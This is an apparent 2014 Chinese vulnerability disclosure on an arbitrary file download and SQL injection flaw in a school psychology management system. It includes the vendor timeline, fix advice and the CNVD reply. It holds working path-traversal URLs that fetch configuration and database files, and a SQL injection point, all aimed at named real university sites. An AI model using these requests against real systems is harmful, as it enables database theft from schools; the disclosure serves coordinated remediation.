漏洞概要
关注数(24)
关注此漏洞
漏洞标题:某通用型管理系统任意文件下载到拖库到SQL注入挖掘
提交时间:2014-05-16 14:10
修复时间:2014-08-14 14:12
公开时间:2014-08-14 14:12
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-24: 细节向第三方安全合作伙伴开放
2014-07-15: 细节向核心白帽子及相关领域专家公开
2014-07-25: 细节向普通白帽子公开
2014-08-04: 细节向实习白帽子公开
2014-08-14: 细节向公众公开
简要描述:
某通用型管理系统任意文件下载漏洞
详细说明:
北京心海导航科技有限公司:http://www.xinhaisoft.com/
心海心理管理系统——中国心理测量第一品牌
客户列表:http://www.xinhaisoft.com/CustomerList.aspx
大部分都是学校用户和教委用户,还是很多的
Google关键字:技术支持:http://www.xinhaisoft.com
任意文件下载漏洞:
admin文件夹下的程序文件fileopen.asp文件,未对身份权限验证和传递的参数过滤导致任意下载漏洞。
下载代码后分析:
Filename = Trim(Request.Form("filename"))
直接传入到下载的文件路径中,位置任何处理,导致漏洞产生。
数据库下载:
下载此系统的view.asp或者list.asp文件:
http://www.xxx.com/xxx/admin/fileopen.asp?filename=../article/list.asp
http://www.xxx.com/admin/fileopen.asp?filename=../article/list.asp
在下载inc/conn.asp文件
http://www.xxx.com/xxx/admin/fileopen.asp?filename=../inc/conn.asp
http://www.xxx.com/admin/fileopen.asp?filename=../inc/conn.asp
在下载SETTINGS.ASP文件:
http://www.xxx.com/xxx/admin/fileopen.asp?filename=../inc/SETTINGS.ASP
http://www.xxx.com/admin/fileopen.asp?filename=../inc/SETTINGS.ASP
至此找到了数据库文件,可以直接下载数据库文件了:
http://www.xxx.com/admin/fileopen.asp?filename=../db/356ghbhhi92sxvgjn9.asp
综上,我们只要直接下载SETTINGS.ASP文件即可,即可知道数据库的文件信息了。
SQL注入漏洞:
我们下载sixiangEdu.asp
再继续下载newslist.asp
看到了typeid没有过滤直接进入SQL语句,导致注入了。
漏洞证明:
任意文件下载:
以湖南工学院为例:http://www2.hnit.edu.cn/xinhai/
下载SETTINGS.ASP文件:
http://www2.hnit.edu.cn/xinhai/admin/fileopen.asp?filename=../inc/SETTINGS.ASP
数据库下载:
以湖南工学院为例:http://www2.hnit.edu.cn/xinhai/
http://www2.hnit.edu.cn/xinhai/admin/fileopen.asp?filename=../db/356ghbhhi92sxvgjn9.asp
500MB数据库有木有
还有吉林工商学院的:
http://xinli.jlbtc.edu.cn/admin/fileopen.asp?filename=../db/dlHU8VlZ1Xj46doBk2Aq1.asp
SQL注入:
以安徽大学为例:http://www.xsc.ahu.edu.cn/
下载文件:
http://www.xsc.ahu.edu.cn/xlzx/admin/fileopen.asp?filename=../../newslist.asp
注入点:
http://www.xsc.ahu.edu.cn/sixiangEdu.asp?typeid=12
安徽大学的数据库:
D:\webroot\xsc\xlzx\db\pas.asp"
修复方案:
1、控制后台文件权限
2、处理下载的文件类型
3、过滤用户输入
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-05-21 08:55
厂商回复:
CNVD确认并复现所述多个实例情况(验证过程由上海交通大学网络信息中心协助完成),已经将通报转报给教育网应急组织赛尔网络公司,并抄报CCERT。同时CNVD已经将通报转报给北京心海导航科技有限公司,QQ邮件:。
最新状态:
暂无